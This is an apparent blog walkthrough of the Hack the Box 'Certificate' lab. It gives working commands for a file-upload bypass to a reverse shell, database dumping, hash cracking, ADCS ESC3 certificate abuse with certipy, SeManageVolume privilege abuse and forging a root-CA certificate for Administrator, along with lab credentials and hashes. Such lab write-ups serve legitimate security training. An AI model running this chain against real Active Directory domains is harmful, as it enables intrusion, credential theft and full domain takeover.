Post

Certificate Hard Machine - Hack the Box

Hard-level Windows machine from Season 8.

Posted Updated
Preview Image
By Mateo Galagorri
11 min read
Certificate Hard Machine - Hack the Box

Information

Certificate Machine is a hard-level Windows machine from Season 8.

Tools

  • nmap
  • hashcat
  • visual studio
  • wireshark
  • bloodhound
  • certipy
  • evil-winrm

In some of the next steps we may get a “Clock skew too great” error. This is just because the difference between the time of the target machine and our machine, this can cause some troubles to communicate and to do some auth techniques.
To resolve this we should run the next command:

1

ntpdate 10.10.11.71

Step by step

  1. Start with Nmap enum:
    1

    nmap -A -p- -T4 -v -P0 -oX certificate_tcp.scan 10.10.11.71 --webxml

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84

    PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 07:27:48Z)
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-01T07:29:26+00:00; +8h00m00s from scanner time.
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-01T07:29:25+00:00; +8h00m00s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T07:29:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3269/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T07:29:25+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
49667/tcp open  msrpc        Microsoft Windows RPC
49691/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc        Microsoft Windows RPC
49693/tcp open  msrpc        Microsoft Windows RPC
49712/tcp open  msrpc        Microsoft Windows RPC
49718/tcp open  msrpc        Microsoft Windows RPC
49737/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   148.28 ms 10.10.14.1
2   148.68 ms 10.10.11.71

    Let’s explore the open port 80.

  2. If we try to connect to http://10.10.11.71 it’ll redirect to http://certificate.htb so we need to add it to our hosts file.
    Exploring all the pages of the website and testing the register/login we eventually reach to the next interesting URL: http://certificate.htb/upload.php?s_id=ID.
    This page allow us to upload files and it’ll be reviewed by an instructor: “Please select the assignment file you want to upload (the file will be reviewed by the course instructor), it’s specially important because it tell us that our uploaded files will be manipulated by someone.
    Normally, we have initial credentials for Windows machines but this time we haven’t, so this form looks like to be our initial entry to get them.
    The file extension needs to be .pdf, .docx, .pptx, .xlsx or .zip so we need a way to bypass this check and maybe attempt to do an RCE.
    After some time trying different bypasses i found a specific bypass for zip files: Concatenated ZIP.
    Using this bypass we can craft a reverse shell:
    rev_shell
  3. Exploring the system with our reverse shell, we should find the database credentials in db.php and then we can dump the database to further research.
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

    <?php
// Database connection using PDO
try {
   $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
   $db_user = 'certificate_webapp_user'; // Change to your DB username
   $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
   $options = [
      PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
      PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
   ];
   $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
   die('Database connection failed: ' . $e->getMessage());
}
?>

    1

    cmd /c mysqldump -u certificate_webapp_user -p"cert!f!c@teDBPWD" Certificate_WEBAPP_DB > backup.sql 2>&1

    Then, to download the dump we can do a Base64 encode/decode:

    1

    [Convert]::ToBase64String([IO.File]::ReadAllBytes("backup.sql"))

    1

    echo "base64encode" | base64 -d > backup.sql
  4. With the dump in our hands we can just open it with visual studio or any other tool and looking for credentials. We should see many student/teachers and one admin inside the users table.
    Then we can attempt to crack the hash with hashcat:
    1

    hashcat -m 3200 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

    We have got a new credential: sara.b:Blink182.
    Attempting remote access with this user:

    1

    evil-winrm -i 10.10.11.71 -u sara.b -p Blink182

    1
2
3
4
5
6
7
8
9
10
11
12

    *Evil-WinRM* PS C:\Users\Sara.B\Documents> ls


Directory: C:\Users\Sara.B\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        11/4/2024  12:53 AM                WS-01


*Evil-WinRM* PS C:\Users\Sara.B\Documents>

    Exploring this user we should notice this is not the one with the user flag, so we need to continue our research. Inside the Documents folder we should see a .pcap file.
    Opening it with Wireshark, after downloaded it, will reveal some auth packets (smb2, kerberos, ntlmssp) that we can use to attempt assembly them and crack the hashes.
    After some tries doing this we eventually be able to extract and crack a kerberos hash using this tool (we can assembly it manually from Wireshark packets too): Krb5RoastParser.
    One thing to notice is that the hash returned by the tool is incomplete, we need to add “.HTB” at the end of the domain part, then we can proceed with the cracking step.

    1

    python3 krb5_roast_parser.py /HTB/Season8/Certificate/WS-01_PktMon.pcap as_req

    1

    $krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

    1

    hashcat -m 19900 kerberos.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

    New credentials: lion.sk:!QAZ2wsx

  5. Remote access with the new user:
    1

    evil-winrm -i 10.10.11.71 -u lion.sk -p !QAZ2wsx

:trophy: USER FLAG PWNED :trophy:

Now, for privesc, we can start by doing a Bloodhound recopilation

  1. 1

    bloodhound-python -d CERTIFICATE.HTB -u lion.sk -p "\!QAZ2wsx" -gc dc01.certificate.htb -c all -ns 10.10.11.71

    Looking into Bloodhound we may notice that lion.sk is member of the group “DOMAIN CRA MANAGERS” and by its description: “The members of this security group are responsible for issuing and revoking multiple certificates for the domain users”, we may think that we can attempt to manipulate certificates with certipy.
    Checking for vulnerable certificates we should found one with ESC3: Enrollment Agent Certificate Template vulnerability.

    1

    certipy find -vulnerable -u lion.sk@certificate.htb -p "\!QAZ2wsx" -dc-ip 10.10.11.71 -stdout

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

    Certificate Templates
0
 Template Name                       : Delegated-CRA
 Display Name                        : Delegated-CRA
 Certificate Authorities             : Certificate-LTD-CA
 Enabled                             : True
 Client Authentication               : False
 Enrollment Agent                    : True
 Any Purpose                         : False
 Enrollee Supplies Subject           : False
 Certificate Name Flag               : SubjectAltRequireUpn
                                       SubjectAltRequireEmail
                                       SubjectRequireEmail
                                       SubjectRequireDirectoryPath
 Enrollment Flag                     : IncludeSymmetricAlgorithms
                                       PublishToDs
                                       AutoEnrollment
 Private Key Flag                    : ExportableKey
 Extended Key Usage                  : Certificate Request Agent
 Requires Manager Approval           : False
 Requires Key Archival               : False
 Authorized Signatures Required      : 0
 Schema Version                      : 2
 Validity Period                     : 1 year
 Renewal Period                      : 6 weeks
 Minimum RSA Key Length              : 2048
 Template Created                    : 2024-11-05T19:52:09+00:00
 Template Last Modified              : 2024-11-05T19:52:10+00:00
 Permissions
   Enrollment Permissions
     Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                       CERTIFICATE.HTB\Domain Admins
                                       CERTIFICATE.HTB\Enterprise Admins
   Object Control Permissions
     Owner                           : CERTIFICATE.HTB\Administrator
     Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                       CERTIFICATE.HTB\Enterprise Admins
     Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                       CERTIFICATE.HTB\Enterprise Admins
     Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                       CERTIFICATE.HTB\Enterprise Admins
     Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                       CERTIFICATE.HTB\Enterprise Admins
 [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
 [!] Vulnerabilities
   ESC3                              : Template has Certificate Request Agent EKU set.                            : Template has Certificate Request Agent EKU set.

    If we attempt to exploit it to obtain the Administrator access it’ll fail so we need to continue exploring other options.

  2. After some research we should find a new user: ryan.k, who is member of the group “DOMAIN STORAGE MANAGERS” and by the group description it can be interesting.
    If we try to exploit the ESC3 again but this time for ryan.k it should work and then we’ll be able to connect via evil-winrm with the user ryan.k.
    1

    certipy req -u 'lion.sk@CERTIFICATE.HTB' -p "\!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

    1

    certipy req -u 'lion.sk@CERTIFICATE.HTB' -p "\!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'

    1

    certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'

    1

    [*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

    1

    evil-winrm -i 10.10.11.71 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
  3. Now we have access to the system with the user ryan.k and checking his privileges we should see the “SeManageVolume” privilege and this can be exploited with: SeManageVolumeExploit.
    This exploit grant us full permission on C:\ drive, then we attempt to access to the Administrator folder and see the content of root.txt. Unfortunately we cannot see the contents of the root.txt file this way although we can access the Administrator desktop.
    But with this exploit we can also access certificates that previously we didn’t have so we can start by checking which ones are available:
    1

    certutil -Store My

    We should see the next one:

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

    ================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft Software Key Storage Provider
Signature test passed
CertUtil: -store command completed successfully.

    This certificate is passwordless and is self-signed which means this is the root CA of the domain, so we can perform a Golden Ticket attack.
    Exporting the certificate:

    1

    certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx
  4. With the .pfx in our hands we can proceed to forge our own certificate for the Administrator account and then finally achieve our final access.
    1

    certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator

    1

    certipy auth -pfx golden_ticket.pfx -dc-ip 10.10.11.71 -user Administrator -domain CERTIFICATE.HTB

    1

    [*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

    1

    evil-winrm -i 10.10.11.71 -u Administrator -H d804304519bf0143c14cbf1c024408c6

:trophy: ROOT FLAG PWNED :trophy:

There is another (i think unintended) path that is achieved by changing the password or doing shadow credentials attack above lion.sk and/or ryan.k using the credentials of sara.b.
This can be done because sara.b is member of the group “ACCOUNT OPERATORS” and this group has GenericAll relationship to lion.sk and ryan.k.
Then you can just connect via evil-winrm with the users.

Cybersecurity, HackTheBox
htb cybersec pentest guide hard windows
This post is licensed under CC BY 4.0 by the author.